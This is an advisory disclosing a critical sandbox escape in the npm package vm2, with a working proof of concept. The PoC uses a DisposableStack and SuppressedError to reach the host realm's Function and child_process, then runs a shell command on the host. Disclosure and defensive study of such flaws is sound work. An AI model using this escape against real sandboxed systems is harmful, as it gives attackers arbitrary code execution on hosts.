CRITICAL 9.8 npm

VM2 Has a Sandbox Escape Issue via SuppressedError

GHSA-55hx-c926-fr95 · CVE-2026-26332


Description

In vm2 v3.10.4 running on Node.js v24.13.0, code executing inside the sandbox can escape it and run arbitrary code on the host by way of SuppressedError. The PoC below registers two callbacks on a DisposableStack: one creates an Error whose name is a Symbol and reads its stack, which throws; the other throws null. Because both disposers throw, dispose() raises a SuppressedError whose suppressed property holds the first error. That object is not a sandbox object: its constructor.constructor is the host realm's Function, from which the PoC reaches process and child_process and executes a shell command.

PoC

const { VM } = require("vm2");

const vm = new VM();

// Untrusted code executed inside the vm2 sandbox.
vm.run(`
const ds = new DisposableStack();
// Disposers run last-in-first-out, so this one runs second and throws null.
ds.defer(() => { throw null; });
// This one runs first: reading .stack on an Error whose name is a Symbol
// throws while the stack trace is formatted.
ds.defer(() => {
  const e = Error();
  e.name = Symbol();
  e.stack;
});
try {
  // Two disposers threw, so dispose() raises a SuppressedError whose
  // .suppressed property is the first error raised.
  ds.dispose();
} catch(e) {
  // That error was not built by the sandbox: its constructor chain reaches
  // the host realm's Function, which carries no vm2 wrapper.
  const Function = e.suppressed.constructor.constructor;
  const process = new Function("return process;")();
  const { execSync } = process.mainModule.require("node:child_process");
  execSync("echo pwned", { stdio: "inherit" }); // runs on the host
}
`);
